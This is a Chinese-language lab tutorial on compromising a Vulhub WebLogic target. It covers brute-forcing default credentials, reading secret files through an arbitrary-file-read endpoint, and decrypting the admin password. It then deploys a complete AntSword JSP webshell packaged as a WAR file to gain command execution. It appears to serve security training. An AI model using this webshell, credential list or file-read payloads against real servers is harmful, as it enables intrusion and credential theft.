Weblogic - General - 弱口令任意文件读取漏洞

0x01：漏洞简介

首先需要说明，本文并不是介绍了 Weblogic 某一 CVE 漏洞，而是提供了一种通用的测试思路。

0x0101：弱口令漏洞

弱口令漏洞主要是由于用户安全意识淡薄，为了便于记忆，设置了强度过低的密码，甚至直接使用系统默认密码。这使得攻击者能够轻易地猜测或破解密码，从而引发安全问题。以下是一些常见的 Weblogic 弱口令：

 system:password
 weblogic:weblogic
 admin:secruity
 joe:password
 mary:password
 system:sercurity
 wlcsystem:wlcsystem
 weblogic:Oracle@123

0x0102：任意文件读取漏洞

任意文件读取漏洞，顾名思义，就是攻击者可以通过一个漏洞读取你服务器上的任意文件信息。

本章我们讲解的 “任意文件读取” 漏洞，并不是 Weblogic 自身的，而是假设其站点应用中存在这么一个漏洞（可以理解为你发现了一个 “任意文件读取” 漏洞，恰巧，这个站点又有一个 Weblogic 应用）我们的利用方法。

除了常见的尝试去包含 /etc/passwd，这种敏感信息外，针对 Weblogic 我们还可以尝试去读取 Weblogic 存储的密钥和密码密文后再使用工具通过 AES 解密出后台明文密码完成登录。

0x02：环境搭建

环境准备

VulHub CSDN配套资源：vulhub-master.zip

靶机环境：CentOS 7 - IP 192.168.0.137 - 安装 VulHub

攻击机环境：Windows 10（安装了常用的安全工具）- IP 192.168.0.1

0x0201：靶机环境搭建

靶机：CentOS 7 服务器配置概览

Docker & Docker 管理工具：Docker & Docker-Compose - 用来管理 Vulhub 靶场。

Git：用来从 GitHub 下载 Vulhub 靶场。

这里我们采用 Vulhub 来进行漏洞的复现，而 Vulhub 需要依靠 docker 来进行管理，对于 CentOS 7 安装 Docker 可以参考下面这篇文章的前两个部分（Docker & Docker-Compose 的安装）：

ARL 灯塔 | CentOS7 — ARL 灯塔搭建流程（Docker）_灯塔arl-CSDN博客文章浏览阅读3.3k次，点赞59次，收藏23次。灯塔，全称：ARL 资产侦察灯塔系统，有着域名资产发现和整理、IP/IP 段资产整理、端口扫描和服务识别、WEB 站点指纹识别、资产分组管理和搜索等等功能块。_灯塔arlhttps://blog.csdn.net/m0_73360524/article/details/143098904https://blog.csdn.net/m0_73360524/article/details/143098904

下面我们主要介绍 CentOS 7 如何通过 Git 来安装 Vulhub 靶场，并通过 Docker 来对靶场进行管理和使用。

1. CentOS 7 安装 Git

首先，输入下面的命令安装 Git：

 sudo yum install -y git

然后输入下面的命令校验 Git 是否安装成功：

 git --version

2. Git 下载 Vulhub 靶场源码

https://github.com/vulhub/vulhubhttps://github.com/vulhub/vulhubhttps://github.com/vulhub/vulhub

输入下面的命令在 /usr/local 文件夹下创建一个 soft 文件夹用以存放安装的软件：

 mkdir /usr/local/soft   # 创建 soft 文件夹
 cd /usr/local/soft      # 进入 soft 文件夹

然后进入 soft 文件夹，输入下面的命令，克隆 Vulhub 项目到本地：

 git clone https://github.com/vulhub/vulhub.git

（可选）如果你无法直接访问到 GitHub，可以通过前面的 “环境准备” 部分直接下载笔者下载好的 VulHub 资源然后上传到服务器中进行安装（笔者也是这样操作的）：

 unzip vulhub-master.zip # 解压操作（可选），直接通过 Git 下载的应该不需要解压吧

通过上面两种方式安装完成后，结果应该长这样：

3. 通过 Docker 启动靶场环境

本次演示的是 Weblogic 的 “弱口令 & 任意文件读取” 漏洞。首先来到 VulHub 的安装路径：

cd /usr/local/soft/vulhub-master # 这是我本机安装的目录，可能与你的不一样哦

然后进入漏洞文件夹：

cd weblogic/weak_password/

接下来的命令都要在靶场根目录下执行，也就是有 docker-compose.yml 文件的这个目录（docker-compose 需要通过读取这个文件来快速配置靶场，如果执行命令的地方没有这个文件，docker-compose 是不起作用的哦）。

输入下面的命令直接启动容器（第一次启动它会拉取镜像，会比较慢，然后有部分小伙伴在拉取镜像的时候会报错，这是因为其默认的镜像源在国外，国内访问不到，换个 Docker 镜像源就行）：

docker-compose up -d # -d 代表后台启动，如果去掉就是前台启动了

然后输入下面命令，查看 Docker 开启的虚拟环境的端口：

docker ps

接下来直接访问靶机的 7001 端口就可以访问漏洞环境啦：

http://192.168.0.137:7001/console

问题解决：物理机无法访问靶机内部的靶场地址。

问题描述： 通过靶机中的 Docker 启动的虚拟环境，靶机可以访问，但是物理机无法访问。 问题解决：

输入下面的命令，修改 selinux/config 文件中的内容：
vim /etc/selinux/config
关机重启虚拟机后回到我们的靶场目录下，输入下面的命令查看容器 ID：
docker ps -a
然后输入下面的命令，重新启动虚拟环境即可（不同机器的容器 ID 是不一样的）：
docker start <容器ID> # 比如上面我的 ID 是 ab84，那我运行的就是 docker start ab84

等待靶机部署完毕后，就会自动跳到 Weblogic 的后台页面啦：

至此，靶机的环境我们已经配置完毕。

4. （附录）Docker 常用命令

以下是一些经常使用的 docker-compose 命令（需要在有 docker-compose.yml 的文件夹下使用）：

docker-compose build # 拉取镜像，创建容器
docker-compose up -d # 启动容器，如果没有容器会自动拉取镜像，创建容器
docker-compose stop  # 停止容器（靶场），容器依旧存在可以通过 docker start <容器ID> 重启启动容器
docker-compose down  # 删除容器（靶场）

以下是一些 docker 常用的命令：

docker version # 查看本机 docker 版本
docker info    # 查看 docker 详细信息
docker ps -a   # 列出所有 docker 容器，包括暂停运行的，可查看容器 ID
docker start <容器 ID> # 启动容器
docker stop  <容器 ID> # 暂停容器
docker exec -it <容器 ID> /bin/bash # 进入容器 Bash
    exit       # 退出容器 Bash 
docker rm <容器 ID>    # 删除容器
docker image rm <镜像 ID> # 删除镜像

0x0202：攻击机环境搭建

攻击机没有什么特殊的环境搭建，安装了 BurpSuite 和 “中国蚁剑” 就可以了。

0x03：漏洞复现

0x0301：漏洞复现 - 弱口令漏洞

弱口令漏洞比较好复现，首先使用 BurpSuite 自带的浏览器访问靶机上的 Weblogic 后台地址：

http://192.168.0.137:7001/console/login/LoginForm.jsp

然后随意输入一个用户名与密码，点击登录后查看抓包情况：

如上，可以看到，提交的账号密码都是明文形式展示的。将这个包发送到 Intruder 模块，然后设置爆破的位置为 j_username 与 j_password，设置攻击模式为 Pitchfork：

然后 Payload 使用漏洞简介中提供的 Weblogic 常见弱口令即可（你也可以自己收集字典来进行爆破，如果你这里不知道怎么设置 Payload，建议还是先学好 BurpSuite 后再来看本文），然后点击 Start Attack 开始攻击：

如上，成功爆破出了后台的账号密码，我们使用 weblogic : Oracle@123 来进行登录看看：

如上，成功进入 Weblogic 后台管理页面。至此，Weblogic 弱口令漏洞利用演示结束（也还没结束，还没拿到目标靶机的控制权呢，继续往后看）。

0x0302：漏洞复现 - 任意文件读取漏洞

在前面的弱口令漏洞中，假设你手头的字典都不管用，但是你发现了目标靶机的一个任意文件读取漏洞，那么你该如何利用该漏洞进行进一步的攻击呢？

那么，假设，你做目录扫描，刚好扫描出来了下面这个目录存在一个任意文件读取漏洞，你还尝试包含了目标的 /etc/passwd：

view-source:http://192.168.0.137:7001/hello/file.jsp?path=/etc/passwd
# view-source =>  查看网页源码（这里可以预览你下载的文件）

如上，我们成功拿到了 /etc/passwd 中的信息，接下来你当然可以去继续拿靶机的 /etc/shadow 中的密码内容，然后进行一个离线爆破，爆破出来后再直接使用账号密码进行登录。但爆破这玩意，说不准，人家给你设置个十几二十位的密码，你爆破到猴年马月才能进。

所以，这里我们选择另一种方法，我们尝试包含 Weblogic 的账号信息：

========================== Weblogic 密文（二进制）存放位置
绝对位置：/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
相对位置：security/SerializedSystemIni.dat
========================== Weblogic 密钥存放位置
绝对位置：/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
相对位置：config/config.xml

首先是包含 Weblogic 的密文信息，由于是二进制的，所以直接看不太好看，这里我们使用 BP：

view-source:http://192.168.0.137:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

首先选中前面框选部分的内容，然后右击，选择 “copy to file” 选项，设置保存的文件名为 xx.dat 即可：

接下来我们来尝试读取密钥文件，访问下面的地址，然后查看抓包信息：

view-source:http://192.168.0.137:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

如上，通过定位 node-manager-username 节点，成功拿到管理员账号和加密密钥：

账号: weblogic
密钥: {AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

拿到了账号信息，接下来就是解密了，解密工具可以使用下面这款 GitHub 开源的工具（文章中还详细介绍了 Weblogic 的解密方法，非常建议详细阅读）：

https://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Password

这里笔者使用的是 “一剑” 大佬写的 weblogic 图形化解密脚本，文件选择的就是我们上面保存的 dat 文件，密钥就是之前获取到的 AES 加密内容：

如上，成功拿到管理员的明文密码 Oracle@123。我们使用 weblogic : Oracle@123 来登录后台：

至此，通过任意文件读取漏洞获取 Weblogic 明文密码登录后台的演示结束（下面就是拿控制权了）。

0x0303：漏洞利用 - Weblogic 后台入侵

通过前面两节，我们已经成功以管理员的身份登录了 Weblogic 的后台了，Weblogic 与 Tomcat 等中间件一样，可以在上面部署应用。利用该特性，我们就可以部署一个后门应用，然后使用工具对其进行连接就能拿到 Shell 了。

首先，创建一个 shell.jsp 文件，文件内容如下，这是一个 AntSword 的 jsp Shell 文件，密码是 passwd：

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

保存该文件后，右击该文件，将该文件打包成 ZIP 文件，然后手动修改后缀为 .war：

然后登录目标的 Weblogic 后台（账号密码之前俺们就拿到了），点击左侧的 “部署”，然后点击 “安装”：

然后点击 “上载文件”，将我们的 shell.war 包上传上去，基本都是无脑下一步：

通过以上操作，我们就可以将后门文件部署上去了，部署了就要访问呀，那么路径怎么判断呢？

很多教程都是叫直接访问 /shell 就行，我们看看，直接访问 /shell 会显示 403 Forbidden：

http://192.168.0.137:7001/shell/

我们分析一下我们制作 war 包的过程，其实就是 jsp 压缩成 zip 后改个名称。那它直接部署 war 包，相当于我们的目录结构长下面这个样子：

/shell.war
    -- shell.jsp

然后 shell.war 作为压缩包，被 weblogic 识别成了文件夹。而我们关键的后门代码在 shell.jsp 中，所以要想拿到 Shell，我们就要直接访问 war 包内部的 shell.jsp，所以真实的路径应该是：

http://192.168.0.137:7001/shell/shell.jsp

没有报错，就证明这个项目存在，就是最好的回应。然后这个 Shell，是 “中国蚁剑” 的 shell，我们拿中国蚁剑连接一下看看，密码是 passwd：

如上，连接成功。我们使用虚拟终端执行个命令看看：

如上，成功拿到了虚拟环境的控制权。从目标回显的 ip 地址 172 可以看出，这其实相对于我物理机来说是一个内网的 IP。那么至此，weblogic 后台入侵演示完毕。

0x04：参考资料

https://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Password